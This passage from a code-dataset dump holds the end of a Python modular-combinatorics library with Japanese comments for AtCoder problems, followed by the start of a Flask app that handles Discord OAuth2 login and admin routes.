== 1: return n\n\n numerator = [n - r + k + 1 for k in range(r)]\n denominator = [k + 1 for k in range(r)]\n for p in range(2, r + 1): # p番目について、\n pivot = denominator[p - 1] # pivotで約分を試みる。\n if pivot > 1: # ただし、pivotが1、すなわちすでに割り尽くされているならp番目は飛ばす。\n offset = (n - r) % p\n for k in range(p - 1, r, p): # p番目を約分できるということはp番目からpの倍数番目も約分可能なので実施する。\n numerator[k - offset] //= pivot\n denominator[k] //= pivot\n\n result = 1\n for k in range(r):\n if numerator[k] > 1:\n result *= int(numerator[k])\n result %= mod\n return result\n\n\n# Udage\nprint(cmb(10, 2)) # = 10C2 = 10 * 9 // 2 * 1\n\"-> 45\"\n\n# ------------------------------------------------------------------------------\n# 組み合わせ(Compination, nCr)\n# ------------------------------------------------------------------------------\n# 解説\n# - mod下のnCr算出。\n# - 特に複数回nCrを算出する問題で有用。\n#\n# リンク\n# - \n# \n# 計算量\n# - O(factorial_max)\n# \n# verify\n# - https://atcoder.jp/contests/abc132/tasks/abc132_d\n# ------------------------------------------------------------------------------\nclass Combination():\n def __init__(self, factorial_max: int, mod: int) -> None:\n \"\"\"\n factorial_max = 7.3 * 10 ** 5 : Python limit (>2sec)\n factorial_max = 10 ** 6 : PyPy limit (=260 ~ 280msec)\n \n O(factorial_max)\n \"\"\"\n self.fac = [1, 1] # fac : 階乗(1!,2!,3!,...)\n self.factorial_max = factorial_max + 1\n self.finv = [1, 1] # inv : 逆元(1,1/2,...1/N) -> inv[i] = pow(i, MOD - 2, MOD) # フェルマーの小定理より\n self.inv = [0, 1] # finv: 階乗の逆元(1/1!, 1/2!, 1/3!...)\n self.mod = mod\n self._build()\n\n def _build(self):\n for i in range(2, self.factorial_max):\n self.fac.append(self.fac[i - 1] * i % self.mod)\n self.inv.append(self.mod - self.inv[self.mod % i] * (self.mod // i) % self.mod)\n self.finv.append(self.finv[i - 1] * self.inv[i] % self.mod)\n\n def nCr(self, n: int, r: int):\n \"\"\"\n O(1)\n \"\"\"\n if n < r: return 0\n if n < 0 or r < 0: return 0\n return self.fac[n] * (self.finv[r] * self.finv[n - r] % self.mod) % self.mod\n \n def nHr(self, n: int, r: int):\n print(\"[注意] factorial_maxはn + rまで必要!!!\")\n \"\"\"\n ◯◯◯◯|◯◯|◯ ← これ系の問題。\n * n : 仕切り版の数 + 1\n * r : 分配する物(◯)自体の数\n \n * 区別のない r 個の物を n グループに分配する。\n eg.) 5個のボールを2個の箱に分配する分け方 : 2H5\n * n 種類の物から重複を許して r 個選択する。\n eg.) 3種類の果物から4個選ぶ取り方 : 3H4\n \n O(1)\n \"\"\"\n print(\"**** factorial_maxの最大値としてn + rが必要となる! 
****\")\n return self.nCr(n - 1 + r, r)\n\n\n# Usage\nMOD = 10 ** 9 + 7\ncomb = Combination(5000, MOD)\n# 特に複数回nCrを計算する場面で有用。\nprint([comb.nCr(10, i) for i in range(10)]) # [1, 10, 45, 120, 210, 252, 210, 120, 45, 10]\n ","repo_name":"K53/atcoder-workspace","sub_path":"lib/Combination.py","file_name":"Combination.py","file_ext":"py","file_size_in_byte":4221,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"7157852276","text":"from flask import Flask, redirect, url_for, render_template, request\r\nfrom flask_discord import DiscordOAuth2Session\r\nfrom video_handler import *\r\nfrom config import *\r\nimport requests\r\n\r\napp = Flask(__name__)\r\nvh = VideoHandler()\r\n\r\nif FLASK_ENVIRONMENT == 'dev':\r\n app.secret_key = b\"DEV_ENV\"\r\n app.config[\"DISCORD_REDIRECT_URI\"] = \"http://localhost:5000/callback\"\r\nelse:\r\n app.secret_key = FLASK_SECRET_KEY\r\n app.config[\"DISCORD_REDIRECT_URI\"] = DISCORD_REDIRECT_URI\r\n\r\napp.config[\"DISCORD_CLIENT_ID\"] = DISCORD_CLIENT_ID\r\napp.config[\"DISCORD_CLIENT_SECRET\"] = DISCORD_CLIENT_SECRET\r\n\r\ndef getUserIP():\r\n if request.environ.get('HTTP_X_FORWARDED_FOR') is None:\r\n return request.environ['REMOTE_ADDR']\r\n else:\r\n return request.environ['HTTP_X_FORWARDED_FOR'] # if behind a proxy\r\n\r\ndef isLoggedIn():\r\n # noinspection PyBroadException\r\n try:\r\n user = discord.fetch_user()\r\n except:\r\n user = None\r\n\r\n return user\r\n\r\ndef userIsInSneakerbotics():\r\n guilds = discord.fetch_guilds()\r\n\r\n for guild in guilds:\r\n if guild.id == 642900909793345536:\r\n return True\r\n\r\ndiscord = DiscordOAuth2Session(app)\r\n\r\n@app.route(\"/login/\")\r\ndef login():\r\n return discord.create_session()\r\n\r\n@app.route(\"/logout/\")\r\ndef logout():\r\n discord.revoke()\r\n\r\n return redirect(url_for(\".index\"))\r\n\r\n@app.route(\"/callback/\")\r\ndef callback():\r\n discord.callback()\r\n return redirect(url_for(\".index\"))\r\n\r\n@app.route(\"/admin/\")\r\ndef admin():\r\n user = isLoggedIn()\r\n\r\n if not user:\r\n return \"Not a user\"\r\n\r\n elif user.id == int(ADMIN):\r\n return render_template('admin.html', user=user)\r\n\r\n else:\r\n return \"Not an admin: \" + str(user.id)\r\n\r\n@app.route(\"/watch/